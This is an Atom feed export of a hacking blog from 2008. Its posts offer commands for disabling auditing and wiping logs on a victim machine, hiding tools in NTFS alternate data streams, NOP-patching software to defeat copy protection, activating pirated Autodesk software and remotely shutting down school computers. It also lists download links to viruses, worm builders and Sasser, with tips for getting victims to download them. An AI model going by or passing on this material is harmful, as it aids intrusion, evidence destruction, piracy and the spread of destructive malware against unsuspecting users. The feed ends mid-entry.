<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-505780039999938232</id><updated>2012-02-16T11:57:28.275-08:00</updated><category term='hacker trace'/><category term='brutus'/><category term='virus coding'/><category term='google tricks'/><category term='hacking software'/><category term='trojan coding'/><category term='password recovery'/><category term='trojans'/><category term='network hacking'/><category term='yahoo hacking'/><category term='netbus'/><category term='password hacking'/><category term='software cracking'/><category term='hacking'/><category term='sql injection'/><category term='trojan builder'/><category term='winrar'/><category term='hacking stories'/><category term='password cracking'/><category term='windows hacking'/><category term='cracking'/><category term='android'/><category term='windows password hacking'/><category term='network exploits'/><category term='fast browsing'/><category term='winrar password recovery'/><category term='android vulnerabilites'/><category term='idm'/><category term='internet speed'/><category term='xp password hacking'/><category term='key generator'/><category term='yahoo messenger'/><category term='android hack'/><category term='yahoo invisible mode'/><category term='xp'/><category term='bruteforce'/><category term='sql exploitssql hacking'/><category term='google'/><category term='virus writing'/><category term='google android'/><title type='text'>Hacx Nd Xploits 4 U...!!...Njoy...!!!</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>25</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-3343143673427215838</id><published>2008-06-21T09:51:00.000-07:00</published><updated>2008-06-21T09:52:37.287-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacker trace'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>How Hackers can Erase their Tracks</title><content type='html'>How hackers can erase their tracks after hacking you. hehe&lt;br /&gt;&lt;br /&gt;This is for educational purpose only..But u can’t hide from me. hehe Just kidding…&lt;br /&gt;&lt;br /&gt;Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.&lt;br /&gt;&lt;br /&gt;Here are some of the techniques that an attacker can use to cover his tracks:-&lt;br /&gt;(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.&lt;br /&gt;Just point it at the victim’s system as follows:&lt;br /&gt;C:\&gt;auditpol \\192.168.10 /disable&lt;br /&gt;Auditing Disabled&lt;br /&gt;&lt;br /&gt;(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.&lt;br /&gt;It is used as follows:&lt;br /&gt;&lt;br /&gt;Elsave -s \\192.168.13.10 -1 “Security” -C&lt;br /&gt;&lt;br /&gt;(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media. &lt;br /&gt;&lt;br /&gt;Another method to hide your trace is by hiding files……….&lt;br /&gt;&lt;br /&gt;Let me give u a short brief explanation on how u can do that. Well, various techniques are used by attackers to hide their tools on the compromised computer. Some attackers might just attempt to use the attribute command to hide files, whereas others might place their files in low traffic areas. A more advanced method is to use NTFS alternate data systems. NTFS alternate data systems (ADS) was developed to provide for compatibility outside of the Windows world with structures, such as the Macintosh Hierarchical File System (HFS). These structures uses resource forks to maintain information associated with a file, such as icons, and so on.&lt;br /&gt;&lt;br /&gt;ADS is a security concern becoz an attacker can use these streams to hide files on a system. As the streams are almost completely hidden, they represent a near perfect hiding spot on a file system. It allows the attacker the perfect place to hide his tools until he needs to use them at a later date. To delete a stream, its pointer must be deleted first or copy the pointer file to a FAT file system. That will delete the stream, as FAT cannot support ADS.&lt;br /&gt;To create an ADS, issue the following command:-&lt;br /&gt;&lt;br /&gt;Type examcram.zip &gt; readme.txt:examcram.zip&lt;br /&gt;&lt;br /&gt;This command streamed examcram.zip behind readme.txt. This is all that is required to stream the file. Now the original secret file can be erased.&lt;br /&gt;&lt;br /&gt;Erase examcram.zip &lt;br /&gt;&lt;br /&gt;All tha hacker must do to retrieve the hidden file is to type tha following:-&lt;br /&gt;&lt;br /&gt;Start c:\readme.txt:examcram.zip&lt;br /&gt;&lt;br /&gt;This will execute ADS and open the secret file. Some tools that are available to detect streamed files include:-&lt;br /&gt;(1) Sfind – A Foundstone forensic tool for finding streamed files&lt;br /&gt;(2) LNS – Another tool used for finding streamed files, developed by ntsecurity.nu&lt;br /&gt;&lt;br /&gt;Note: Linux does not support ADS, although an interesting slack space tool is available called Bmap, which can be downloaded from http://www.securityfocus.com/tools/1359. This Linux tool has the capability to pack data into existing slack space. Anything could be hidden there, as long as it fits within the available space, or is parsed up to meet the existing size requirements.&lt;br /&gt;&lt;br /&gt;One final step for tha attacker might well be to gain a command prompt on the victim’s system. This allows the attacker to actually be the owner of the box. Some tools that allow the attacker to have a command prompt on the system include Psexec, Remoxec, and Netcat.&lt;br /&gt;&lt;br /&gt;Credits: *** Rani tha ***&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-3343143673427215838?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/3343143673427215838/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=3343143673427215838' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3343143673427215838'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3343143673427215838'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/06/how-hackers-can-erase-their-tracks.html' title='How Hackers can Erase their Tracks'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-2048151252752913383</id><published>2008-06-15T13:21:00.000-07:00</published><updated>2008-06-15T13:28:43.807-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='key generator'/><category scheme='http://www.blogger.com/atom/ns#' term='software cracking'/><title type='text'>HOW TO CRACK ANY SOFTWARE??</title><content type='html'>In this tutorial you will learn how to crack any type of software protection using&lt;br /&gt;W32Dasm and HIEW.&lt;br /&gt;&lt;br /&gt;IDENTIFYING THE PROTECTION:&lt;br /&gt;Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the&lt;br /&gt;CD reader. SoftwareX will not run of course, however, when the error window pops up it&lt;br /&gt;will give you all of the vital information that you need to crack the program, so be sure to&lt;br /&gt;write down what it says.&lt;br /&gt;CRACKING THE PROTECTION:&lt;br /&gt;Now, run Win32Dasm. On the file menu open DISASSEMBLER &gt; OPEN FILE TO&lt;br /&gt;DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will&lt;br /&gt;appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.&lt;br /&gt;When W32Dasm finishes disassembling the file it will display unrecognizable text; this is&lt;br /&gt;what we want. Click on the String Data References button. Scroll through the String Data&lt;br /&gt;Items until you find SoftwareX’s error message. When you locate it, double click the&lt;br /&gt;error message and then close the window to return to the Win32Dasm text. You will&lt;br /&gt;notice that you have been moved somewhere within the SoftwareX’s check routine; this&lt;br /&gt;is where the error message in generated.&lt;br /&gt;Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must&lt;br /&gt;know the @offset of every call and jump command. Write down every call and jump&lt;br /&gt;@offset number that you see (You have to be sure, that the OPBAR change its used color&lt;br /&gt;to green). You need the number behind the @offset without the “h.”&lt;br /&gt;Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a&lt;br /&gt;popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to&lt;br /&gt;see a list of numbers. Now press the F5 key and enter the number that was extracted using&lt;br /&gt;Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check&lt;br /&gt;routine within HIEW.&lt;br /&gt;If the command that you are taken to is&lt;br /&gt;E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits&lt;br /&gt;equal one byte: E9-2B-F9-BF-74 =&gt; 10 digits =&gt; 5 bytes. If you understood this then you&lt;br /&gt;can continue.&lt;br /&gt;Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the&lt;br /&gt;digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90).&lt;br /&gt;After you complete this step press the F10 key to exit.&lt;br /&gt;Congratulations! You just cracked SoftwareX!&lt;br /&gt;Don’t panic if SoftwareX will not run after you finished cracking it. It only means that&lt;br /&gt;something was done incorrectly, or perhaps SoftwareX’s protection technology has been&lt;br /&gt;improved or created after this tutorial. Simply reinstall SoftwareX and start over. If you’re&lt;br /&gt;sure that you completed all steps correctly and the program still will not run, then tough&lt;br /&gt;nuts. Their protection was developed after the writing of this tutorial.&lt;br /&gt;ONE MORE TRICK&lt;br /&gt;&lt;br /&gt;Originally Posted by miggittymacdadd&lt;br /&gt;&lt;br /&gt;1. Install the software and choose License Type as "Network" while asked.&lt;br /&gt;2. After installation, copy VIZ2007\adlmdll.dll to ...\Autodesk\VIZ2007 and overwrite the original one.&lt;br /&gt;3. Setup Flexlm License Server with the files in the supplied FlexLM directory.&lt;br /&gt;4. Start the inventor, input 2080@your_server_host_name or just point to license.lic while the license is requested.&lt;br /&gt;ONE MORE TRICK!!&lt;br /&gt;&lt;br /&gt;Copy &lt;CD Drive&gt;\Crack\FlexLM directory to C:\Program Files\Autodesk\&lt;br /&gt;&lt;br /&gt;Run "C:\Program Files\Autodesk\FlexLM\lmtools.exe"&lt;br /&gt;&lt;br /&gt;Select "Config Services" tab at the top&lt;br /&gt;&lt;br /&gt;Click "Browse" on the line "Path to the lmgrd.exe file"&lt;br /&gt;Find the file in C:\Program Files\Autodesk\FlexLM\&lt;br /&gt;Click "Open"&lt;br /&gt;&lt;br /&gt;Click "Browse" on the line "Path to the license file"&lt;br /&gt;Find the file in C:\Program Files\Autodesk\FlexLM\&lt;br /&gt;Click "Open"&lt;br /&gt;&lt;br /&gt;In the Path to Debug Log file field&lt;br /&gt;Enter "C:\Program Files\Autodesk\FlexLM\Debug.log"&lt;br /&gt;&lt;br /&gt;Select "Use Services" and "Start Server at Power Up"&lt;br /&gt;&lt;br /&gt;Click "Save Service"&lt;br /&gt;Click "Yes"&lt;br /&gt;&lt;br /&gt;Select "Start/Stop/Reread" tab at the top&lt;br /&gt;Click "Start Server"&lt;br /&gt;&lt;br /&gt;Select "File" then click "Exit"&lt;br /&gt;&lt;br /&gt;Run Autodesk VIZ 2007&lt;br /&gt;Select "Specify the License File"&lt;br /&gt;Click "Next"&lt;br /&gt;Click "Browse"&lt;br /&gt;Find the file in C:\Program Files\Autodesk\FlexLM\&lt;br /&gt;Click "Open"&lt;br /&gt;Click "Next"&lt;br /&gt;Click "Finish"&lt;br /&gt;&lt;br /&gt;If the License File can't be found rerun "C:\Program Files\Autodesk\FlexLM\lmtools.exe"&lt;br /&gt;Select "Start/Stop/Reread" tab at the top&lt;br /&gt;Click "Stop Server"&lt;br /&gt;Click "Start Server"&lt;br /&gt;&lt;br /&gt;and try running Autodesk VIZ 2007 again&lt;br /&gt;credits - rani tha&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-2048151252752913383?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/2048151252752913383/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=2048151252752913383' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2048151252752913383'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/2048151252752913383'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/06/how-to-crack-any-software.html' title='HOW TO CRACK ANY SOFTWARE??'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-384445760699764835</id><published>2008-04-13T05:37:00.000-07:00</published><updated>2008-04-13T05:38:13.722-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='network exploits'/><category scheme='http://www.blogger.com/atom/ns#' term='network hacking'/><title type='text'>Play Wid Networks..!!</title><content type='html'>You wanna mess around with your school network?&lt;br /&gt;&lt;br /&gt;You wanna own the shit out of some kiddies who think they're the best?&lt;br /&gt;&lt;br /&gt;Well thankfully there's the shutdown function in cmd Smile&lt;br /&gt;&lt;br /&gt;First of all you need to have access to a cmd prompt on the network for this to work.&lt;br /&gt;&lt;br /&gt;If it's disabled you can obviously run everything from .bat files.&lt;br /&gt;&lt;br /&gt;So first type in&lt;br /&gt;Code:&lt;br /&gt;Net View&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This will give you all the names for all the computers on the network.&lt;br /&gt;&lt;br /&gt;Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.&lt;br /&gt;&lt;br /&gt;What next? Well if you're a lil skiddy yourself then the easiest thing to do is type in&lt;br /&gt;Code:&lt;br /&gt;shutdown -i&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.&lt;br /&gt;&lt;br /&gt;commands you will use if you just wanna use the command interface are&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;shutdown -m //computername&lt;br /&gt;- shutsdown the pc.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;shutdown -m -c "owned"&lt;br /&gt;shutdown with a comment.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;shutdown -l&lt;br /&gt;logoff the user.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;shutdown -r&lt;br /&gt;restart the computer.&lt;br /&gt;&lt;br /&gt;and so on...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-384445760699764835?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/384445760699764835/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=384445760699764835' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/384445760699764835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/384445760699764835'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/play-wid-networks.html' title='Play Wid Networks..!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-801828743377378402</id><published>2008-04-13T05:35:00.001-07:00</published><updated>2008-04-13T05:35:47.416-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>online downloadable virus list!!</title><content type='html'>hxxp://web.tiscali.it/johnnycrk2/virus/happy99.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/Melissa.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/x.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/POLY.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/rundll.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/Speed.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/Unknow.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/Unknow2.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/nowviru.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/all.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/auto.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/best.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/document.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/good.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/nice.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/simpatic.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/goodbye.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/mora.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/windows.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/mac.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/yvirus.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/xviruz.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/95.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/d-g.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti2.zip&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hxxp://web.tiscali.it/johnnycrk2/virus/h-j.zip&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-801828743377378402?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/801828743377378402/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=801828743377378402' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/801828743377378402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/801828743377378402'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/online-downloadable-virus-list.html' title='online downloadable virus list!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-1334278543296180913</id><published>2008-04-13T05:34:00.001-07:00</published><updated>2008-04-13T05:34:56.927-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>Awesome Virus 2..!!..Njoy..!!</title><content type='html'>WARNING: Do NOT open this on your own computer!!&lt;br /&gt;&lt;br /&gt;This is how the virus works::&lt;br /&gt;&lt;br /&gt;first it will change the color of the cmd box&lt;br /&gt;then it will change the time on the computer to midnight 12:00&lt;br /&gt;then it will shut down the anti virus and firewall&lt;br /&gt;and copy itself into the startup menu and registry&lt;br /&gt;after that it will change its own attribute to hide and read only&lt;br /&gt;so the victim cant remove the virus&lt;br /&gt;after that it will kill processes such as MSN, limewire,&lt;br /&gt;internet explorer, firefox, etc etc&lt;br /&gt;then it will split itself 20 times and flood the WINDOWS folder&lt;br /&gt;It will then delete everything from the windows folder and system 32, then completly erase the WHOLE C drive,&lt;br /&gt;and finally it will shut itself down, and by the time the computer has restarted, it will become useless as it will have deleted EVERYTHING uncluding the windows login screen&lt;br /&gt;&lt;br /&gt;Heres the download:&lt;br /&gt;http://rapidshare.com/files/74221720/shroom.zip.html&lt;br /&gt;&lt;br /&gt;P.S, Batch virus's are a bitch to send over MSN so i would advise you upload it to a website and let the victim download the file&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-1334278543296180913?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/1334278543296180913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=1334278543296180913' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1334278543296180913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/1334278543296180913'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/awesome-virus-2njoy.html' title='Awesome Virus 2..!!..Njoy..!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-3078346137129799167</id><published>2008-04-13T05:32:00.000-07:00</published><updated>2008-04-13T05:33:25.471-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>A DOS virus builder</title><content type='html'>h@@p://rapidshare.com/files/65701348/vc.zip [Replace @@ with tt]&lt;br /&gt;====================&lt;br /&gt;&lt;br /&gt;Nice easy worm generator that will spread through network shares and emails , it will scan for emails ,it has irc bot and more options.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/65704232/Pokes-Worm-Gen-2.zip&lt;br /&gt;====================&lt;br /&gt;&lt;br /&gt;Builds worm and add spread options like email or mIRC then you choose what to infect on computers,change PC name, go to url option, antideletion, polymorphic and other shit.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/65701343/vbswg2.zip&lt;br /&gt;====================&lt;br /&gt;&lt;br /&gt;This little program allows you to add source code and generate your own worm/virus,it has some samples of code inside the zip too.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/65702742/Dr._VBS_Virus_Maker.zip&lt;br /&gt;====================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-3078346137129799167?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/3078346137129799167/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=3078346137129799167' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3078346137129799167'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/3078346137129799167'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/dos-virus-builder.html' title='A DOS virus builder'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-4883872138398006601</id><published>2008-04-13T05:31:00.001-07:00</published><updated>2008-04-13T05:32:26.873-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus coding'/><category scheme='http://www.blogger.com/atom/ns#' term='virus writing'/><title type='text'>Awesome Virus...!!</title><content type='html'>WARNING: Do NOT open this on your own computer!!&lt;br /&gt;It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it&lt;br /&gt;http://rapidshare.com/files/78696248/Smile.exe.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65703684/MXZ.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65703373/massacre.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.&lt;br /&gt;&lt;br /&gt;h@@p://rapidshare.com/files/65700942/sasser.b.zip&lt;br /&gt;===================&lt;br /&gt;&lt;br /&gt;Plz Notify if the link is broken or is detectable..&lt;br /&gt;&lt;br /&gt;Replace @@ with tt...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/505780039999938232-4883872138398006601?l=wanna2hack.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wanna2hack.blogspot.com/feeds/4883872138398006601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=505780039999938232&amp;postID=4883872138398006601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/4883872138398006601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/505780039999938232/posts/default/4883872138398006601'/><link rel='alternate' type='text/html' href='http://wanna2hack.blogspot.com/2008/04/awesome-virus_13.html' title='Awesome Virus...!!'/><author><name>Mohit Agrawal</name><uri>http://www.blogger.com/profile/05334898536589832297</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://bp2.blogger.com/_eniK8-MS-uk/SASwF05xcAI/AAAAAAAAACI/kMhQ2ZG4gBQ/S220/Bhai..jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-505780039999938232.post-2172819775198283564</id><published>2008-04-13T05:31:00.000-07:00</published><updated>2008-04-13T05:32:25.048-07:00</updated><category 